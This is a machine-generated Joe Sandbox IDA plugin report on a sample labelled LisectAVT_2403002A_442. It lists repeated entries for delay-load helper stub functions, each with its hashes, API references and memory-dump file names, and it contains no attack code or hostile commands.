Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 3b47ce1a0a390fc88dd8853f30ae022cecc12bf9ac131507d302b918799bab60
Instruction ID: 399baa3196234cca1ab7dfce788bfdff11ef10a603e7085ea52b36cb2f28e411
Opcode Fuzzy Hash: 3b47ce1a0a390fc88dd8853f30ae022cecc12bf9ac131507d302b918799bab60
Instruction Fuzzy Hash: AAB012E13BD00D6C324C610C7D02E36020FC4C0F10330802EB24DD00C1E6447D470432

Function 006FD8CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: f38bf5498ef72138f36af89ab31823509a74a29dcf742c96362d122541d4dd62
Instruction ID: 3a16a015187967ddbb0eb56f56aa12af5f3bbc546f5f32ae398efe567a48f03d
Opcode Fuzzy Hash: f38bf5498ef72138f36af89ab31823509a74a29dcf742c96362d122541d4dd62
Instruction Fuzzy Hash: FEB012D137D00D6C324C610C7D02E36020FC4C0F10330C02EB249D01C1D6447C8F0432

Function 006FD8C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 484ee3d4190adbbfe32b3693f8c350bf9010662015faf662d2f28e5417bddc1a
Instruction ID: e9371451d982eb8721a39b9de4e94ce0e5490a598382a8f85a61b3393040598b
Opcode Fuzzy Hash: 484ee3d4190adbbfe32b3693f8c350bf9010662015faf662d2f28e5417bddc1a
Instruction Fuzzy Hash: 85B012D137D10D6C328C610C7C02E36020FC4C0F10331C52EB249D01C1D6447CCB0432

Function 006FD8DE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 3c6ea37959fe9af359f9b77c6495ec7c65c6d9ff396e9350d23ef8deb6313cc7
Instruction ID: 7b1180c5e5eacbbacfbdba201b13bccbbd5a137cfa444bc69b789df1c7a0b7c8
Opcode Fuzzy Hash: 3c6ea37959fe9af359f9b77c6495ec7c65c6d9ff396e9350d23ef8deb6313cc7
Instruction Fuzzy Hash: 89B012E13BD00D6C324C610C7C02E36020FC8C1F10330C12EB64DD00C1E6447C460432

Function 006FD8AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 56c653be1d4d962ec7ae1f5ca3e144ea06cffb697e0ee7775e73d3bfb6154bd8
Instruction ID: d47f8e94b712611bd528257135e03126e412698fd6007cf986e6fcb268eebc72
Opcode Fuzzy Hash: 56c653be1d4d962ec7ae1f5ca3e144ea06cffb697e0ee7775e73d3bfb6154bd8
Instruction Fuzzy Hash: EEB012D537D10D6D324C610C7C42E3B020FD4C0F10330802EB249D00C1D6447C460536

Function 006FD8B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 553e3046327943a1abe57596dcadcb855be3958de1b03989a245ada7bca1c1e6
Instruction ID: 1e755f43a1a5a15f892c23b49a3a1d7ed82d6a3c7d83d9cfb9a0181e41344766
Opcode Fuzzy Hash: 553e3046327943a1abe57596dcadcb855be3958de1b03989a245ada7bca1c1e6
Instruction Fuzzy Hash: B6B012D137D00D6C324C610C7C02E36024FC8C1F10330C02EB649D01C1D6447C8B0432

Function 006FD891 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: c600e45cc5e1583d3ddc3bf84cd2f947ed74c31756c1b740c5faeefab8760e09
Instruction ID: e6bc98f7652cf0acc549a65171c9286e99e4ab7b39a87d93071f7c8ccce0996b
Opcode Fuzzy Hash: c600e45cc5e1583d3ddc3bf84cd2f947ed74c31756c1b740c5faeefab8760e09
Instruction Fuzzy Hash: 5EB012D537D30D7D324C21087C52D3B020FC4C0F10330853EB249E00C1D6447C8A4436

Function 006FD942 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 8d715d625a62e8b1e50e5c8be0bc4e632a95b14d9b36c8ddfdb518b3ebe7cd5b
Instruction ID: e44dfd02da69db407ae3edab1dfbf463b706a81de4602c700caa15036353a282
Opcode Fuzzy Hash: 8d715d625a62e8b1e50e5c8be0bc4e632a95b14d9b36c8ddfdb518b3ebe7cd5b
Instruction Fuzzy Hash: D2B012E137D00DAC324C610C7D02E36028FC4C0F10330802EB249E00C1D6447C470432

Function 006FD92E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: f4a299bd0f2dcc299802b0830fc8dd5ecf290897c87713aeadfe15a8fdde486c
Instruction ID: 4fd2dd83eebec0658bb0e794369e61360d1bb56da82b1282ac377d136a89a3c9
Opcode Fuzzy Hash: f4a299bd0f2dcc299802b0830fc8dd5ecf290897c87713aeadfe15a8fdde486c
Instruction Fuzzy Hash: DBB012D537D00DAC324C611C7C02E36024FC8C1F10330C02EB749E00C1D7447C460432

Function 006FD924 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 03586e6b86e1177a0e2371db99b49ad0ccae5c89ae54ce01f611d0cf6583baab
Instruction ID: c44fc63cbc8da9e2c6cfd7d8e2db85bf64776ff429115545ac22ad0dd41c33fb
Opcode Fuzzy Hash: 03586e6b86e1177a0e2371db99b49ad0ccae5c89ae54ce01f611d0cf6583baab
Instruction Fuzzy Hash: D2B012D137E00D6D324C610C7C02E36024FC8C0F10330802EB249D00C1D6447C460432

Function 006FD906 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 912acdd72c3b2151968e5f75ad602181a8921e2649eb90ddf82714de8f021344
Instruction ID: 88799419ff66790fea0012edee7a0940d60d670420d69fd795114bc5da7f2f93
Opcode Fuzzy Hash: 912acdd72c3b2151968e5f75ad602181a8921e2649eb90ddf82714de8f021344
Instruction Fuzzy Hash: 5EB012D137E00D6D324C610C7C02E36020FC8C1F10330C02EB649D00C1D6447C560432

Function 006FD910 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: caed4d64a6f113050d486699f613fc4a3f257d72ed1837058d5f46508d0c45b0
Instruction ID: 65f4847a91d45d9fef0f2da3e8776cab60575ab9f0dac734d6e76f24cc29af63
Opcode Fuzzy Hash: caed4d64a6f113050d486699f613fc4a3f257d72ed1837058d5f46508d0c45b0
Instruction Fuzzy Hash: F8B012E137E10D6D328C620C7C02E36020FC4C0F10330812EB249D00C1D6447C860432

Function 006FD8D9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: a54f47555aec582143a5f6bd8164647a7b513b5bdf1878486ec96a5adb60874d
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: a54f47555aec582143a5f6bd8164647a7b513b5bdf1878486ec96a5adb60874d
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD96F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 52adf65853f7c3116832afb28738b73f472f599d8c1724bcee10776d8b5f0ee4
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: 52adf65853f7c3116832afb28738b73f472f599d8c1724bcee10776d8b5f0ee4
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD965 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 6e01fafd2d1db2d0ec1116c67b5d61c960750b2e40b524320a3c9b562c824916
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: 6e01fafd2d1db2d0ec1116c67b5d61c960750b2e40b524320a3c9b562c824916
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD979 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
API String ID: 1269201914-3032091488
Opcode ID: 0258cb94f4a20336b3ec22ef79e3658a6843e3f3209468bcc58950fb41668fa0
Instruction ID: ad5601c980b4f6516dc792d6838492288fe7c341c5aa728ac1a9ecf6eede02cb
Opcode Fuzzy Hash: 0258cb94f4a20336b3ec22ef79e3658a6843e3f3209468bcc58950fb41668fa0
Instruction Fuzzy Hash: 49A012D127D00A7C310C21047C02D36020FC4C0F50330840DB146900C0954038450431

Function 006FD95B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 006FD8A3

Part of subcall function 006FDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 006FDFD6
Part of subcall function 006FDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 006FDFE7

Strings

I=u, xrefs: 006FD89D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: I=u
